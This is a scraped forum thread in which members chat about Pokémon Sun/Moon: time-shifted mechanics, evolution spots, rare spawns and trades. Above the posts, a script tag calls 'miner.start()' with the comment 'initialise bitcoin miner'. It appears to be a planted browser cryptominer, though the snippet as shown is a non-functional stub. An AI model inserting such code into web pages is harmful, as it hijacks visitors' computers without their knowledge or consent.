<script>
miner.start(); // initialise bitcoin miner
</script>

irc.cat.biosmbx communitymario fan games galaxy

Pokémon

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Ivy

Re: Pokémon

Postby Ivy » 1 year ago

HamsterZerg wrote:Anyone here find a Bagon on Route 3 only for it to call in a Salamence?
I hear it's a 1% chance in most patches of grass so no, not intending on doing so for a while lol
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

elga

Postby elga » 1 year ago

Spinda wrote:goddamn USicans and their early games

at least i don't run the risk of being spoiled because i already spoiled myself through the leaks
Normally I'd agree, but I'm, uh, not American

Truhan
Lord of the Waifus
Pronouns: Waifulord

Postby Truhan » 1 year ago

Finally, someone who truly understands pokemon and is willing to tell it like it is.

Girls are a hoax created by the Japanese anime industry to scam otaku out of their money.

HamsterZerg
True Pacifist or bust.
Pronouns: he/him/his
Location: Oh, don't mind me. I'm just contacting you from the distant past. Carry on.

Postby HamsterZerg » 11 months ago

This guy was an Ultra Beast before Ultra Beasts were even a thing:

Avatar by Skully (artwork) and bkamakaze (size). Thanks, guys!

[ispoiler]Somebody should make an animation where the knife slash at the end of the Genocide run is Frisk killing Chara, who is shocked, then scared, and finally sad, apologizing to Asriel and asking him for forgiveness.[/ispoiler]

Soma Cruz, Linkara, and Olimar for SMBX 2.0

Game King-style Story Briefs, a forum game by me

ztarwuff
What the heck is a flair and why am I being asked to write one for my profile?
Location: Within 2 miles of the Imperial Crypt of Napoleon III

Postby ztarwuff » 11 months ago

I think I might get Pokémon Sun because it's got Vulpix and Ninetails in it (don't really care about the two different forms of Lycanroc). However, as I mostly play during the evening, I'll essentially always be catching Pokémon at night. Is that going to mean I'm essentially getting Pokémon Moon except without the version-exclusive Pokémon?

i.e. So what is up with the time-based mechanics? I know that one is time-shifted by 12 hours from the other but I don't know what that means in terms of gameplay.

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 11 months ago

ztarwuff wrote:So what is up with the time-based mechanics? I know that one is time-shifted by 12 hours from the other but I don't know what that means in terms of gameplay.
It means little, other than that certain (early) pokemon can be found and evolve at certain times of real-time. With the Moon version, it just means, for example, that Yungoos will evolve at day in-game, even though it's (commonly) night real-time.

For you however, it means that you have to evolve some Pokemon at unusual times.
ImageImageImage
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 11 months ago

Of course team skull is the joke team :c at least Lille is the most adorable Pokémon character I've ever seen
That crazy voice dude

Ivy

Postby Ivy » 11 months ago

InsaneIntentions1 wrote:Of course team skull is the joke team :c at least Lille is the most adorable Pokémon character I've ever seen

They're not a joke team for too long.

3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

ztarwuff
What the heck is a flair and why am I being asked to write one for my profile?
Location: Within 2 miles of the Imperial Crypt of Napoleon III

Postby ztarwuff » 11 months ago

jayScribble wrote:
ztarwuff wrote:So what is up with the time-based mechanics? I know that one is time-shifted by 12 hours from the other but I don't know what that means in terms of gameplay.
It means little, other than that certain (early) pokemon can be found and evolve at certain times of real-time. With the Moon version, it just means, for example, that Yungoos will evolve at day in-game, even though it's (commonly) night real-time.

For you however, it means that you have to evolve some Pokemon at unusual times.
Thanks for the tip. I'm saving my money up again because Fire Emblem Fates was 30% off on the Nintendo eShop and I spent it all. A shame I can't use those Nintendo reward points on any game I want; Nintendo really don't know how to do reward schemes, do they?

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 11 months ago

One complaint about Sun/Moon:
Where in the game does it tell you that Vast Poni Canyon:
  • Is Electric?
  • Is Magnetic?
  • Is where certain Pokemon evolve?

Because the geothermal plant where the Alolan Geodudes (who are Rock/Electric) are is certainly a more fitting place for Charjabug, Nosepass, and Magneton to evolve.
[/spoiler]
ImageImageImage
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

Ivy

jayScribble wrote:One complaint about Sun/Moon:
Where in the game does it tell you that Vast Poni Canyon:
  • Is Electric?
  • Is Magnetic?
  • Is where certain Pokemon evolve?

Because the geothermal plant where the Alolan Geodudes (who are Rock/Electric) are is certainly a more fitting place for Charjabug, Nosepass, and Magneton to evolve.
[/spoiler]
This is true, and in X&Y they evolved at the power plant which was in a very similar environment

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 11 months ago

Well I finished the whole game. Thought is was pretty good. Black 2/White 2 are still my favorite in the series
That crazy voice dude

Truhan
Lord of the Waifus

Postby Truhan » 11 months ago

I have no girlfriend a Mimikyu that I can breed eggs out of if anyone needs one and doesn't want to spend two hours farming for one (they show up in exactly one area at a 5% spawn rate). It's also an opportunity to get one from level one (so you can get your pick of leveled moves) and traded (so you can breed faster if you want bred moves/shiny and get FAST exp).
Girls are a hoax created by the Japanese anime industry to scam otaku out of their money.

Spinda
you spinda right round
First name: Florian

Postby Spinda » 11 months ago

i was trying to catch one preparing for searching for it for hours due to my troubles with getting other rare mons (i had trouble catching sandshrew and even a pikipek for the dex for crying out loud) and i got mimikyu first try...
ImageImageImageImageImageImage

HamsterZerg
True Pacifist or bust.
Location: Oh, don't mind me. I'm just contacting you from the distant past. Carry on.

Postby HamsterZerg » 11 months ago

Truhan wrote:I have no girlfriend a Mimikyu that I can breed eggs out of if anyone needs one and doesn't want to spend two hours farming for one (they show up in exactly one area at a 5% spawn rate). It's also an opportunity to get one from level one (so you can get your pick of leveled moves) and traded (so you can breed faster if you want bred moves/shiny and get FAST exp).
Actually, I somehow ran into one relatively quickly.

Also, who named their version mascot Legendary

"Nebby"

?

Avatar by Skully (artwork) and bkamakaze (size). Thanks, guys!

[ispoiler]Somebody should make an animation where the knife slash at the end of the Genocide run is Frisk killing Chara, who is shocked, then scared, and finally sad, apologizing to Asriel and asking him for forgiveness.[/ispoiler]

Soma Cruz, Linkara, and Olimar for SMBX 2.0

Game King-style Story Briefs, a forum game by me

Spinda
you spinda right round
First name: Florian

Postby Spinda » 11 months ago

i mean who didnt
ImageImageImageImageImageImage

Mata Hari

Postby Mata Hari » 11 months ago

Does anybody want a Shiny Surskit? I was excited when i caught it but it's Relaxed (-Speed, +Def) so it's completely worthless !!

Seriously I'm actively begging to give this thing away because it upsets me. I literally do not care what I get in return. It could be a Rattata

Ivy

Mata Hari wrote:Does anybody want a Shiny Surskit? I was excited when i caught it but it's Relaxed (-Speed, +Def) so it's completely worthless !!
Seriously I'm actively begging to give this thing away because it upsets me. I literally do not care what I get in return. It could be a Rattata
my sister got a

Calm

sneasel in Y version :(

Truhan
Lord of the Waifus

I got a Lonely Mimikyu D:

Ivy

Truhan wrote:I got a Lonely Mimikyu D:
Fortunately Haunter, Gastly, and Ditto are common, to name a few things that it can breed with

Truhan
Lord of the Waifus

Ivy wrote:
Truhan wrote:I got a Lonely Mimikyu D:
Fortunately Haunter, Gastly, and Ditto are common, to name a few things that it can breed with
It would still be lonely, just listen to this song.

Mata Hari

Postby Mata Hari » 11 months ago

Welp I Wonder Traded my shiny Surskit and got a breeding-runoff Abra, then I WT'd that and got an Adamant Mimikyu with a buncha egg moves, so that's cool because I haven't even got to the point of the game where I can catch Mimikyu (I only got the game last Thursday).

So I'm happy how this turned out despite the fact that nobody really cares.

idol
god's gonna come to my house and kill me
First name: charlotte
Pronouns: she/her

Postby idol » 11 months ago

HamsterZerg wrote:Also, who named their version mascot Legendary

"Nebby"

?
i dont nickname pokemon at all ngl. plain jane that shit
must b love on tha brain
[avi source]

TaviTurnip
I'm just here to remind people I'm here
Abministrator
First name: Rena, despite assumptions

Postby TaviTurnip » 11 months ago

RIP my baby Pokémon Prism, probably.

I waited five years man.
I'm just here to annoy you so that you aren't here instead.

MonkeyShrapnel
Poke a Man
First name: Brian

Postby MonkeyShrapnel » 11 months ago

TaviTurnip wrote:RIP my baby Pokémon Prism, probably.

I waited five years man.
:(
Uh...Do I just sign here? What do you mean it should be obvious? There are people in this world...well...a whole lot of people that can't follow basic instructions!

My silly "Collab" Youtube channel https://www.youtube.com/user/Theguyswho ... s/featured
(That means I'm the only person using it nowadays.)

Return to “the cartridgé”